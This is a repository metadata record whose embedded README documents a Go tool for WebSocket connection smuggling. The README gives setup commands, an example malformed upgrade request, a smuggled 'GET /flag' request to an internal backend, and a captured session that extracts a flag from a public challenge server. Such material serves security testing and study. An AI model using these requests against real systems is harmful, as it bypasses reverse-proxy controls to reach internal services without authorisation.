{"id":13762738,"url":"https://github.com/hahwul/websocket-connection-smuggler","last_synced_at":"2025-10-06T18:44:34.572Z","repository":{"id":57518861,"uuid":"224883683","full_name":"hahwul/websocket-connection-smuggler","owner":"hahwul","description":"websocket-connection-smuggler","archived":false,"fork":false,"pushed_at":"2020-01-22T16:14:56.000Z","size":3060,"stargazers_count":68,"open_issues_count":0,"forks_count":15,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-05-06T21:03:19.617Z","etag":null,"topics":["bugbounty","hacking","security","testing-tools","websocket","websocket-connection-smuggling"],"latest_commit_sha":null,"homepage":null,"language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/hahwul.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2019-11-29T15:59:54.000Z","updated_at":"2024-12-24T06:19:43.000Z","dependencies_parsed_at":"2022-09-26T18:00:44.658Z","dependency_job_id":null,"html_url":"https://github.com/hahwul/websocket-connection-smuggler","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hahwul%2Fwebsocket-connection-smuggler","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hahwul%2Fwebsocket-connection-smuggler/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hahwul%2Fwebsocket-connection-smuggler/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hahwul%2Fwebsocket-connection-smuggler/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/hahwul","download_url":"https://codeload.github.com/hahwul/websocket-connection-smuggler/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":252769398,"owners_count":21801376,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bugbounty","hacking","security","testing-tools","websocket","websocket-connection-smuggling"],"created_at":"2024-08-03T14:00:56.099Z","updated_at":"2025-10-06T18:44:29.536Z","avatar_url":"https://github.com/hahwul.png","language":"Go","funding_links":["https://www.paypal.me/hahwul","https://www.buymeacoffee.com/hahwul"],"categories":["Weapons"],"sub_categories":["Tools"],"readme":"\u003cimg src=\"https://user-images.githubusercontent.com/13212227/70248653-8de45d00-17be-11ea-9602-6b8f2754ddfb.png\"\u003e\n\n\u003ca href=\"https://twitter.com/intent/follow?screen_name=hahwul\"\u003e\u003cimg src=\"https://img.shields.io/twitter/follow/hahwul?style=flat-square\"\u003e\u003c/a\u003e\n\n# websocket-connection-smuggler\n## Dependency\n```cassandraql\n$ go get -u github.com/c-bata/go-prompt\n```\n\n## Install \n```cassandraql\n$ go get github.com/hahwul/websocket-connection-smuggler\n```\n\nor \n\n```cassandraql\n$ git clone https://github.com/hahwul/websocket-connection-smuggler\n$ cd websocket-connection-smuggler\n$ go build\n$ ./websocket-connection-smuggler\n```\n\n## Usage\n### 1. run wcs(websocket-connection-smuggler)\n```cassandraql\n$ websocket-connection-smuggler\n```\n\n### 2. set target address(domain or ip address)\n```cassandraql\n$ WCS(...) \u003e set target {your target}\n```\n\n### 3. is SSL? (default is false)\n```cassandraql\n# HTTPS\n$ WCS(...) \u003e set ssl true\n\n# HTTP\n$ WCS(...) \u003e set ssl false\n```\n\n### 4. set original request(o_data)\n\nIt used the default editor defined in the environment variables, such as vim and no. If you don't have any special settings, vim is the default.\n```cassandraql\n$ WCS(...) \u003e set o_data\n```\n\ne.g\n```cassandraql\nGET /socket.io/?transport-websocket HTTP/1.1\nHost: localhost:80\nSec-WebSocket-Version: 4444\nUpgrade: websocket\n\n```\n\n### 5. set smuggling reqeust(s_data)\n\nIt used the default editor defined in the environment variables, such as vim and no. If you don't have any special settings, vim is the default.\n```cassandraql\n$ WCS(...) \u003e set s_data\n```\n\ne.g\n```cassandraql\nGET /flag HTTP/1.1 \nHost: localhost:5000\n\n```\n\n## Test to 0ang3el Websocket Smuggling Challenge\n```\n\n             ___          \n            /   \\\\        \n       /\\\\ | . . \\\\       \n     ////\\\\|     ||       \n   ////   \\\\ ___//\\       \n  ///      \\\\      \\      \n ///       |\\\\      |     \n//         | \\\\  \\   \\    \n/          |  \\\\  \\   \\   \n           |   \\\\ /   /   \n           |    \\/   /    \n            ---------\n     WebSocket Connection Smuggler\n     by @hahwul\n\nWCS(target=\u003eNone | ssl=\u003efalse ) \u003e set target challenge.0ang3el.tk:80\nWCS(target=\u003echallenge.0ang3el.tk:80 | ssl=\u003efalse ) \u003e set o_data\nWCS(target=\u003echallenge.0ang3el.tk:80 | ssl=\u003efalse ) \u003e set s_data\nWCS(target=\u003echallenge.0ang3el.tk:80 | ssl=\u003efalse ) \u003e send\nGET /socket.io/?transport-websocket HTTP/1.1\nHost: localhost:80\nSec-WebSocket-Version: 4444\nUpgrade: websocket\n\n2019/11/30 03:39:15 HTTP/1.1 200 OK\nContent-Type: application/json\nContent-Length: 49\nDate: Fri, 29 Nov 2019 18:39:15 GMT\n\n{\"flag\": \"In 50VI37 rUS5I4 vODK@ DRiNKs YOu!!!\"}\ngth: 119\nDate: Fri, 29 Nov 2019 18:39:14 GMT\n\n        �0{\"pingInterval\":25000,\"pingTimeout\":60000,\"upgrades\":[\"websocket\"],\"sid\":\"5148720e07f240a99e6aa7457f41686f\"}�40\n```\n\n## Video on asciinema\n[![asciicast](https://asciinema.org/a/vSYXtlQtvh7yBh0uBES9r5BMV.svg)](https://asciinema.org/a/vSYXtlQtvh7yBh0uBES9r5BMV)\n\n## Donate\nI like coffee! I'm a coffee addict.\u003cbr\u003e\n\u003ca href=\"https://www.paypal.me/hahwul\"\u003e\u003cimg src=\"https://www.paypalobjects.com/digitalassets/c/website/logo/full-text/pp_fc_hl.svg\" height=\"50px\"\u003e\u003c/a\u003e\n\u003ca href=\"https://www.buymeacoffee.com/hahwul\"\u003e\u003cimg src=\"https://cdn.buymeacoffee.com/buttons/default-black.png\" alt=\"Buy Me A Coffee\" height=\"50px\"\u003e\u003c/a\u003e\n\n## Reference\n- https://speakerdeck.com/0ang3el/whats-wrong-with-websocket-apis-unveiling-vulnerabilities-in-websocket-apis\n- https://www.hahwul.com/2019/10/websocket-connection-smuggling.html\n- https://github.com/hahwul/websocket-connection-smuggling-go\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhahwul%2Fwebsocket-connection-smuggler","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fhahwul%2Fwebsocket-connection-smuggler","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhahwul%2Fwebsocket-connection-smuggler/lists"}